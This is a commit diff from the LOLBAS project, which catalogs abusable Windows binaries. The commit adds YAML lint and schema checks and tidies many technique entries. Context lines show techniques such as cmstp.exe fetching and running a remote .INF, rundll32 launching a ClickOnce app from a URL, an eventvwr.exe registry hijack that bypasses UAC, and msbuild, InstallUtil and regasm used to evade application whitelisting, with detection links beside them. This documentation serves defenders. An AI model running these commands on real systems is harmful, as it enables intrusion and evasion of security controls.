mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-27 23:37:58 +01:00
Merge pull request #251 from xenoscr/master
YAML Linting & Schema Checks
This commit is contained in:
commit
5e55bcb82e
8
.github/.yamllint
vendored
8
.github/.yamllint
vendored
@ -4,12 +4,12 @@ yaml-files:
|
||||
- '*.yml'
|
||||
rules:
|
||||
new-line-at-end-of-file:
|
||||
level: warning
|
||||
level: error
|
||||
trailing-spaces:
|
||||
level: warning
|
||||
level: error
|
||||
line-length:
|
||||
level: warning
|
||||
new-lines:
|
||||
level: warning
|
||||
level: error
|
||||
indentation:
|
||||
level: warning
|
||||
level: error
|
||||
|
2
.github/workflows/gh-pages.yml
vendored
2
.github/workflows/gh-pages.yml
vendored
@ -16,7 +16,7 @@ jobs:
|
||||
|
||||
- name: Change .yml to .md
|
||||
run: |
|
||||
for x in $(find yml/ -name '*.yml'); do mv "$x" "${x/%\.yml/.md}"; done
|
||||
for x in $(find yml/ -name '*.yml'); do echo "---" >> "$x"; mv "$x" "${x/%\.yml/.md}"; done
|
||||
mv yml/OSBinaries yml/Binaries
|
||||
mv yml/OSLibraries yml/Libraries
|
||||
mv yml/OSScripts yml/Scripts
|
||||
|
34
.github/workflows/yaml-linting.yml
vendored
34
.github/workflows/yaml-linting.yml
vendored
@ -1,19 +1,35 @@
|
||||
---
|
||||
name: YAML Lint
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
pull_request:
|
||||
branches:
|
||||
- master
|
||||
name: PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks
|
||||
on: [push,pull_request]
|
||||
|
||||
jobs:
|
||||
lintFiles:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v1
|
||||
- uses: actions/checkout@v3
|
||||
- name: yaml-lint
|
||||
uses: ibiqlik/action-yamllint@v3
|
||||
with:
|
||||
no_warnings: true
|
||||
file_or_dir: yml/**/*.yml
|
||||
config_file: .github/.yamllint
|
||||
- name: Validate OSBinaries YAML Schema
|
||||
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||
with:
|
||||
files: yml/OSBinaries/*.yml
|
||||
schema: YML-Schema.yml
|
||||
- name: Validate OSLibraries YAML Schema
|
||||
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||
with:
|
||||
files: yml/OSLibraries/*.yml
|
||||
schema: YML-Schema.yml
|
||||
- name: Validate OSScripts YAML Schema
|
||||
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||
with:
|
||||
files: yml/OSScripts/*.yml
|
||||
schema: YML-Schema.yml
|
||||
- name: Validate OtherMSBinaries YAML Schema
|
||||
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||
with:
|
||||
files: yml/OtherMSBinaries/*.yml
|
||||
schema: YML-Schema.yml
|
||||
|
35
.github/yaml-lint-reviewdog.yml.bak
vendored
Normal file
35
.github/yaml-lint-reviewdog.yml.bak
vendored
Normal file
@ -0,0 +1,35 @@
|
||||
---
|
||||
name: PULL_REQUEST - YAML Lint with Reviewdog & Schema Checks
|
||||
on: [pull_request]
|
||||
|
||||
jobs:
|
||||
lintFiles:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v3
|
||||
- name: Run yamllint
|
||||
uses: reviewdog/action-yamllint@v1
|
||||
with:
|
||||
level: error
|
||||
reporter: github-pr-review # Change reporter.
|
||||
yamllint_flags: '--config-file .github/.yamllint yml/**/*.yml'
|
||||
- name: Validate OSBinaries YAML Schema
|
||||
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||
with:
|
||||
files: yml/OSBinaries/*.yml
|
||||
schema: YML-Schema.yml
|
||||
- name: Validate OSLibraries YAML Schema
|
||||
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||
with:
|
||||
files: yml/OSLibraries/*.yml
|
||||
schema: YML-Schema.yml
|
||||
- name: Validate OSScripts YAML Schema
|
||||
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||
with:
|
||||
files: yml/OSScripts/*.yml
|
||||
schema: YML-Schema.yml
|
||||
- name: Validate OtherMSBinaries YAML Schema
|
||||
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||
with:
|
||||
files: yml/OtherMSBinaries/*.yml
|
||||
schema: YML-Schema.yml
|
@ -25,4 +25,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
---
|
||||
|
@ -23,4 +23,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Bart
|
||||
Handle: '@bartblaze'
|
||||
---
|
||||
|
@ -15,4 +15,3 @@ Full_Path:
|
||||
- Path: '%localappdata%\Whatsapp\Update.exe'
|
||||
Detection:
|
||||
- IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process'
|
||||
---
|
||||
|
@ -25,4 +25,3 @@ Acknowledgement:
|
||||
Handle: '@@vysecurity'
|
||||
- Person: Adam (Internals)
|
||||
Handle: '@Hexacorn'
|
||||
---
|
||||
|
118
YML-Schema.yml
Normal file
118
YML-Schema.yml
Normal file
@ -0,0 +1,118 @@
|
||||
---
|
||||
type: map
|
||||
mapping:
|
||||
# Id field enhancement possibility commenting out for now
|
||||
# "Id":
|
||||
# type: str
|
||||
# required: true
|
||||
# pattern: '[a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}'
|
||||
"Name":
|
||||
type: str
|
||||
required: true
|
||||
"Description":
|
||||
type: str
|
||||
required: true
|
||||
"Aliases":
|
||||
type: seq
|
||||
required: false
|
||||
sequence:
|
||||
- type: map
|
||||
mapping:
|
||||
"Alias":
|
||||
type: str
|
||||
required: false
|
||||
"Author":
|
||||
type: str
|
||||
required: true
|
||||
"Created":
|
||||
type: date
|
||||
required: true
|
||||
"Commands":
|
||||
type: seq
|
||||
required: true
|
||||
sequence:
|
||||
- type: map
|
||||
mapping:
|
||||
"Command":
|
||||
type: str
|
||||
required: true
|
||||
"Description":
|
||||
type: str
|
||||
required: true
|
||||
"Usecase":
|
||||
type: str
|
||||
required: true
|
||||
"Category":
|
||||
type: str
|
||||
required: true
|
||||
enum: [ADS, AWL Bypass, Compile, Conceal, Copy, Credentials, Decode, Download, Dump, Encode, Execute, Reconnaissance, Tamper, UAC Bypass, Upload]
|
||||
"Privileges":
|
||||
type: str
|
||||
required: true
|
||||
"MitreID":
|
||||
type: str
|
||||
required: true
|
||||
pattern: '^T[0-9]{4}(\.[0-9]{3})?$'
|
||||
"OperatingSystem":
|
||||
type: str
|
||||
required: true
|
||||
"Full_Path":
|
||||
type: seq
|
||||
required: true
|
||||
sequence:
|
||||
- type: map
|
||||
mapping:
|
||||
"Path":
|
||||
type: str
|
||||
required: true
|
||||
"Code_Sample":
|
||||
type: seq
|
||||
required: false
|
||||
sequence:
|
||||
- type: map
|
||||
mapping:
|
||||
"Code":
|
||||
type: str
|
||||
"Detection":
|
||||
type: seq
|
||||
required: false
|
||||
sequence:
|
||||
- type: map
|
||||
mapping:
|
||||
"IOC":
|
||||
type: str
|
||||
"Sigma":
|
||||
type: str
|
||||
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
|
||||
"Analysis":
|
||||
type: str
|
||||
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
|
||||
"Elastic":
|
||||
type: str
|
||||
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
|
||||
"Splunk":
|
||||
type: str
|
||||
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
|
||||
"BlockRule":
|
||||
type: str
|
||||
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
|
||||
"Resources":
|
||||
type: seq
|
||||
required: false
|
||||
sequence:
|
||||
- type: map
|
||||
mapping:
|
||||
"Link":
|
||||
type: str
|
||||
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
|
||||
"Acknowledgement":
|
||||
type: seq
|
||||
required: false
|
||||
sequence:
|
||||
- type: map
|
||||
mapping:
|
||||
"Person":
|
||||
type: str
|
||||
"Handle":
|
||||
type: str
|
||||
pattern: '^(@(\w){1,15})?$'
|
@ -6,6 +6,8 @@ Created: YYYY-MM-DD (date the person created this file)
|
||||
Commands:
|
||||
- Command: The command
|
||||
Description: Description of the command
|
||||
Aliases:
|
||||
- An alias for the command (example: ProcDump.exe & ProcDump64.exe)
|
||||
Usecase: A description of the usecase
|
||||
Category: Execute
|
||||
Privileges: Required privs
|
||||
|
@ -20,4 +20,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Wade Hickey
|
||||
Handle: '@notwhickey'
|
||||
---
|
||||
|
@ -25,4 +25,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: cpl
|
||||
Handle: '@cpl3h'
|
||||
---
|
||||
|
@ -23,7 +23,7 @@ Detection:
|
||||
- IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
|
||||
Resources:
|
||||
- Link: https://freddiebarrsmith.com/at.txt
|
||||
- Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator
|
||||
- Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
|
||||
- Link: https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
|
||||
Acknowledgement:
|
||||
- Person: 'Freddie Barr-Smith'
|
||||
@ -34,4 +34,3 @@ Acknowledgement:
|
||||
Handle:
|
||||
- Person: 'Xabier Ugarte-Pedrero'
|
||||
Handle:
|
||||
---
|
||||
|
@ -14,8 +14,6 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Atbroker.exe
|
||||
- Path: C:\Windows\SysWOW64\Atbroker.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml
|
||||
@ -27,4 +25,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Adam
|
||||
Handle: '@hexacorn'
|
||||
---
|
||||
|
@ -48,4 +48,3 @@ Acknowledgement:
|
||||
Handle: '@aionescu'
|
||||
- Person: Asif Matadar
|
||||
Handle: '@d1r4c'
|
||||
---
|
||||
|
@ -46,7 +46,7 @@ Detection:
|
||||
- IOC: bitsadmin creates new files
|
||||
- IOC: bitsadmin adds data to alternate data stream
|
||||
Resources:
|
||||
- Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53
|
||||
- Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679
|
||||
- Link: https://www.youtube.com/watch?v=_8xJaaQlpBo
|
||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
Acknowledgement:
|
||||
@ -56,4 +56,3 @@ Acknowledgement:
|
||||
Handle: '@carnal0wnage'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -34,4 +34,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Ensar Samil
|
||||
Handle: '@sblmsrsn'
|
||||
---
|
||||
|
@ -32,4 +32,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: David Middlehurst
|
||||
Handle: '@dtmsecurity'
|
||||
---
|
||||
|
@ -75,4 +75,3 @@ Acknowledgement:
|
||||
- Person: egre55
|
||||
Handle: '@egre55'
|
||||
- Person: Lior Adar
|
||||
---
|
||||
|
@ -21,8 +21,6 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cmd.exe
|
||||
- Path: C:\Windows\SysWOW64\cmd.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml
|
||||
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml
|
||||
@ -34,4 +32,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: r0lan
|
||||
Handle: '@yeyint_mth'
|
||||
---
|
||||
|
@ -14,8 +14,6 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cmdkey.exe
|
||||
- Path: C:\Windows\SysWOW64\cmdkey.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml
|
||||
Resources:
|
||||
@ -24,4 +22,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person:
|
||||
Handle:
|
||||
---
|
||||
|
@ -23,4 +23,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Elliot Killick
|
||||
Handle: '@elliotkillick'
|
||||
---
|
||||
|
@ -14,15 +14,13 @@ Commands:
|
||||
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
|
||||
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
||||
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
|
||||
Category: AwL bypass
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218.003
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cmstp.exe
|
||||
- Path: C:\Windows\SysWOW64\cmstp.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml
|
||||
@ -44,4 +42,3 @@ Acknowledgement:
|
||||
Handle: '@oddvarmoe'
|
||||
- Person: Nick Tyrer
|
||||
Handle: '@NickTyrer'
|
||||
---
|
||||
|
@ -29,4 +29,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Ialle Teixeira
|
||||
Handle: '@NtSetDefault'
|
||||
---
|
||||
|
@ -24,4 +24,3 @@ Acknowledgement:
|
||||
Handle: '@hexacorn'
|
||||
- Person: Wietze
|
||||
Handle: '@wietze'
|
||||
---
|
||||
|
@ -34,4 +34,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
|
@ -34,4 +34,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person:
|
||||
Handle:
|
||||
---
|
||||
|
@ -33,4 +33,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -27,4 +27,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Ialle Teixeira
|
||||
Handle: '@NtSetDefault'
|
||||
---
|
||||
|
@ -26,4 +26,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Gal Kristal
|
||||
Handle: '@gal_kristal'
|
||||
---
|
||||
|
@ -7,7 +7,7 @@ Commands:
|
||||
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
|
||||
Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
|
||||
Usecase: Use binary to bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
@ -26,4 +26,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
|
@ -35,4 +35,3 @@ Acknowledgement:
|
||||
Handle: '@tim8288'
|
||||
- Person: Hai Vaknin
|
||||
Handle: '@vakninhai'
|
||||
---
|
||||
|
@ -33,4 +33,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
|
@ -32,4 +32,3 @@ Acknowledgement:
|
||||
Handle: '@dim0x69'
|
||||
- Person: Nikhil SamratAshok
|
||||
Handle: '@nikhil_mitt'
|
||||
---
|
||||
|
@ -66,5 +66,4 @@ Acknowledgement:
|
||||
- Person: egre55
|
||||
Handle: '@egre55'
|
||||
- Person: Mike Cary
|
||||
Handle: 'grayfold3d'
|
||||
---
|
||||
Handle: '@grayfold3d'
|
||||
|
@ -7,7 +7,7 @@ Commands:
|
||||
- Command: eventvwr.exe
|
||||
Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
|
||||
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
|
||||
Category: UAC bypass
|
||||
Category: UAC Bypass
|
||||
Privileges: User
|
||||
MitreID: T1548.002
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
@ -31,4 +31,3 @@ Acknowledgement:
|
||||
Handle: '@enigma0x3'
|
||||
- Person: Matt Graeber
|
||||
Handle: '@mattifestation'
|
||||
---
|
||||
|
@ -41,4 +41,3 @@ Acknowledgement:
|
||||
Handle: '@infosecn1nja'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -37,4 +37,3 @@ Acknowledgement:
|
||||
Handle: '@CyberRaiju'
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
Name: Extexport.exe
|
||||
Description:
|
||||
Description: Load a DLL located in the c:\test folder with a specific name.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
@ -24,4 +24,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Adam
|
||||
Handle: '@hexacorn'
|
||||
---
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
Name: Extrac32.exe
|
||||
Description:
|
||||
Description: Extract to ADS, copy or overwrite a file with Extrac32.exe
|
||||
Author: 'Oddvar Moe'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
@ -54,4 +54,3 @@ Acknowledgement:
|
||||
Handle: '@VakninHai'
|
||||
- Person: Tamir Yehuda
|
||||
Handle: '@tim8288'
|
||||
---
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
Name: Findstr.exe
|
||||
Description:
|
||||
Description: Write to ADS, discover, or download files with Findstr.exe
|
||||
Author: 'Oddvar Moe'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
@ -45,4 +45,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -28,4 +28,3 @@ Acknowledgement:
|
||||
Handle: '@Ocelotty6669'
|
||||
- Person: Malwrologist
|
||||
Handle: '@DissectMalware'
|
||||
---
|
||||
|
@ -25,4 +25,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Carlos Perez
|
||||
Handle: '@Carlos_Perez'
|
||||
---
|
||||
|
@ -34,4 +34,3 @@ Acknowledgement:
|
||||
Handle: '@vector_sec'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -38,4 +38,3 @@ Acknowledgement:
|
||||
Handle: ''
|
||||
- Person: Amit Serper
|
||||
Handle: '@0xAmit'
|
||||
---
|
||||
|
@ -176,4 +176,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Jesus Galvez
|
||||
Handle:
|
||||
---
|
||||
|
@ -32,4 +32,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -35,4 +35,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -20,4 +20,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Wade Hickey
|
||||
Handle: '@notwhickey'
|
||||
---
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
Name: Ie4uinit.exe
|
||||
Description:
|
||||
Description: Executes commands from a specially prepared ie4uinit.inf file.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
@ -27,4 +27,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
|
@ -34,4 +34,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
|
@ -17,6 +17,7 @@ Commands:
|
||||
Category: Compile
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 10,7
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
|
||||
@ -32,4 +33,3 @@ Acknowledgement:
|
||||
Handle: '@VakninHai'
|
||||
- Person: Lior Adar
|
||||
Handle:
|
||||
---
|
||||
|
@ -26,4 +26,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Kyle Hanslovan
|
||||
Handle: '@kylehanslovan'
|
||||
---
|
||||
|
@ -7,7 +7,7 @@ Commands:
|
||||
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
||||
Description: Execute the target .NET DLL or EXE.
|
||||
Usecase: Use to execute code and bypass application whitelisting
|
||||
Category: AWL bypass
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
@ -39,4 +39,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
|
@ -34,4 +34,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Malwrologist
|
||||
Handle: '@DissectMalware'
|
||||
---
|
||||
|
@ -40,4 +40,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -36,4 +36,3 @@ Acknowledgement:
|
||||
Handle: '@gN3mes1s'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -56,4 +56,3 @@ Acknowledgement:
|
||||
Handle: '@FortyNorthSec'
|
||||
- Person: Bank Security
|
||||
Handle: '@Bank_Security'
|
||||
---
|
||||
|
@ -34,4 +34,3 @@ Acknowledgement:
|
||||
Handle: '@bohops'
|
||||
- Person: clem
|
||||
Handle: '@clavoillotte'
|
||||
---
|
||||
|
@ -53,4 +53,3 @@ Acknowledgement:
|
||||
Handle: ''
|
||||
- Person: Cedric
|
||||
Handle: '@th3c3dr1c'
|
||||
---
|
||||
|
@ -7,7 +7,7 @@ Commands:
|
||||
- Command: msbuild.exe pshell.xml
|
||||
Description: Build and execute a C# project stored in the target XML file.
|
||||
Usecase: Compile and run code
|
||||
Category: AWL bypass
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1127.001
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
@ -77,4 +77,3 @@ Acknowledgement:
|
||||
Handle: '@Cneelis'
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
|
@ -24,4 +24,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
---
|
||||
|
@ -14,7 +14,7 @@ Commands:
|
||||
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
|
||||
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
|
||||
Usecase: Execute code bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
@ -33,4 +33,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person:
|
||||
Handle:
|
||||
---
|
||||
|
@ -69,4 +69,3 @@ Acknowledgement:
|
||||
Handle: '@subtee'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -51,4 +51,3 @@ Acknowledgement:
|
||||
Handle: '@netbiosX'
|
||||
- Person: Philip Tsukerman
|
||||
Handle: '@PhilipTsukerman'
|
||||
---
|
||||
|
@ -34,4 +34,3 @@ Acknowledgement:
|
||||
Handle:
|
||||
- Person: 'Xabier Ugarte-Pedrero'
|
||||
Handle:
|
||||
---
|
||||
|
@ -36,4 +36,3 @@ Acknowledgement:
|
||||
Handle: '@subtee'
|
||||
- Person: Adam
|
||||
Handle: '@Hexacorn'
|
||||
---
|
||||
|
@ -19,4 +19,3 @@ Detection:
|
||||
Acknowledgement:
|
||||
- Person: Elliot Killick
|
||||
Handle: '@elliotkillick'
|
||||
---
|
||||
|
@ -21,4 +21,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Elliot Killick
|
||||
Handle: '@elliotkillick'
|
||||
---
|
||||
|
@ -38,4 +38,3 @@ Acknowledgement:
|
||||
Handle: '@kylehanslovan'
|
||||
- Person: Fab
|
||||
Handle: '@0rbz_'
|
||||
---
|
||||
|
@ -22,4 +22,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
---
|
||||
|
@ -31,4 +31,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Derek Johnson
|
||||
Handle: ''
|
||||
---
|
||||
|
@ -22,4 +22,3 @@ Acknowledgement:
|
||||
Handle: '@LuxNoBulIshit'
|
||||
- Person: Avihay eldad
|
||||
Handle: '@aloneliassaf'
|
||||
---
|
||||
|
@ -25,4 +25,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
|
@ -40,4 +40,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -28,4 +28,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Elliot Killick
|
||||
Handle: '@elliotkillick'
|
||||
---
|
||||
|
@ -25,4 +25,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Leon Rodenko
|
||||
Handle: '@L3m0nada'
|
||||
---
|
||||
|
@ -24,4 +24,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: FireEye
|
||||
Handle: '@FireEye'
|
||||
---
|
||||
|
@ -41,4 +41,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Grzegorz Tworek
|
||||
Handle: '@0gtweet'
|
||||
---
|
@ -36,4 +36,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -7,7 +7,7 @@ Commands:
|
||||
- Command: regasm.exe AllTheThingsx64.dll
|
||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||
Usecase: Execute code and bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
Category: AWL Bypass
|
||||
Privileges: Local Admin
|
||||
MitreID: T1218.009
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
@ -38,4 +38,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
|
@ -32,4 +32,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -25,4 +25,3 @@ Resources:
|
||||
